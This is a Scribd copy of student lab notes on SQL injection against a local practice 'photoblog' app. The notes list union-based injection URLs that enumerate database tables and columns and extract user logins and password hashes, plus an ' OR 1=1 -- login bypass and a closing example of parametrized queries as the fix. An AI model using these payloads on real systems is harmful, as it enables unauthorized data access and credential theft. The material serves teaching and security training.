Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                
Scribd
Upload
6 views

SQL Injection Quick Notes

Uploaded by

maaryamrh
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
6 views

SQL Injection Quick Notes

Uploaded by

maaryamrh
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 24

1

SQL INJECTION QUICK NOTES

WORKING WITH BACK END DATABASE:


mysql -u root Connects to MySQL database management system.

show databases; Show databases

use photoblog; Select photoblog database

show tables; Show tables

select * from users; Show "users" table content


2

select * from pictures; Show "pictures" table content

show columns from users; Show users table structure

show columns from pictures; Show pictures table structure


3

select * from pictures union select * from Show an error the two select queries have different number of columns;
users;

select title from pictures union select login Show column title from pictures concatenated with column login from users
from users;

Select title,img from pictures union select Show columns title,img from pictures concatenated with columns login,password
login,password from users; from users
4

Quit Quits mysql


Ifconfig Get IP address

WORKING WITH FRONT END WEB SITE:


In what follows, replace the IP address by
your machine IP address.
http://192.168.1.144/cat.php?id=1 ===> select * from pictures where cat=1
==> Show pictures of category 1
5

http://192.168.1.144/cat.php?id=2 ===> select * from pictures where cat=2


==> Show other pictures of category 2
6

http://192.168.1.144/cat.php?id=2% ===> select * from pictures where cat=2%


==> Show Error

http://192.168.1.144/cat.php?id=2-1 ===> select * from pictures where cat=2-1


==> Show pictures of category 1
7

http://192.168.1.144/cat.php?id=1+1 ===> select * from pictures where cat=1 + 1


==> Show Error
8

===> select * from pictures where cat=1 union select 1


==> Show error as number of columns in the left select statement is different from
the right select statement

http://192.168.1.144/cat.php?id=1 union ===> select * from pictures where cat=1 union select 1,2
select 1,2 ==> Show error as number of columns in the left select statement is different from
the right select statement

http://192.168.1.144/cat.php?id=1 union ===> select * from pictures where cat=1 union select 1,2,3
select 1,2,3 ==> Show error as number of columns in the left select statement is different from
the right select statement
9

http://192.168.1.144/cat.php?id=1 union ===> select * from pictures where cat=2 union select 1,2,3,4
select 1,2,3,4 ==> no error, the left select statement have 4 columns.
Also, image and image title are coming from column number 2 in the left and right
select statements.
Hacker could use column number 2 as input in the URL, and output in the page for
SQL Injection scripts.
10

http://192.168.1.144/cat.php?id=1 union Show mysql version


select 1,@@version,3,4
11

http://192.168.1.144/cat.php?id=1 union Show current mysql user


select 1,current_user(),3,4
12

http://192.168.1.144/cat.php?id=1 union Show current used database: photoblog.


select 1,database(),3,4
13

http://192.168.1.144/cat.php?id=1 union Show all tables names used in mysql DBMS.


select 1,table_name,3,4 from We clearly see the database tables: categories, pictures and users.
information_schema.tables
14

192.168.1.144/cat.php?id=1union select Show all tables column names used in mysql DBMS.
1,column_name,3,4 from We clearly see the columns: login, password which belongs to the table users.
information_schema.columns
15

http://192.168.1.144/cat.php?id=1 union The hacker could get user login easily.


select 1,login,3,4 from users
16

http://192.168.1.144/cat.php?id=1 union The hacker could get user password easily. Here the password is encrypted.
select 1,password,3,4 from users
17

http://192.168.1.144/cat.php?id=1 union The hacker could get user login and password easily. Here the password is
select 1,concat(login, %27:%27, encrypted.
password),3,4 from users
18
19

Enter website www.md5online.org, and try


to decrypt the encrypted password.

The password is "P4ssw0d"


20

SIMPLE EXERCICE:
In the following section. We will create our own table, and try to hack it.

mysql -u root Connects to MySQL database management system.

use photoblog; Select photoblog database

CREATE TABLE employee (employee_name Creates the table employee.


varchar(250), employee_job varchar(250));

INSERT INTO employee (employee_name, Insert first record to employee table.’


employee_job) VALUES ('Ali Baba', 'cartoon');

INSERT INTO employee (employee_name, Insert second record to employee table.


employee_job) VALUES ('Samir Sabri', 'actor');

SELECT * from employee; View employee table content.


21

Go back to the browser and continue.


http://192.168.1.144/cat.php?id=1 union select Show employee names.
1,employee_name,3,4 from employee
22

http://192.168.1.144/cat.php?id=1 union select Show employee names and jobs.


1,concat(employee_name,
%27:%27,employee_job),3,4 from employee
23
24

Hacking techniques over login page:

If you enter login=jsmith and password=demo1234, your query become in the back end:

SELECT * from users where login='jsmith' and password='demo1234';

If you enter login=' and password=a, your query become in the back end:

SELECT * from users where login=''' and password='a';

If you enter login=' OR 1=1 -- and password=demo1234, your query become in the back end:

SELECT * from users where login='' OR 1=1 --' and password='demo1234';

Parametrized queries:

query = "SELECT * FROM USERS WHERE LOGIN =? and password =?";

pstmt.setparameter(1, "’ OR 1=1 --");

pstmt.setparameter(2, "demo1234");

===> SQL will search for users with login =’ OR 1=1 -- and password=demo1234. The injected script will not be considered as part of the SQL
statement.

You might also like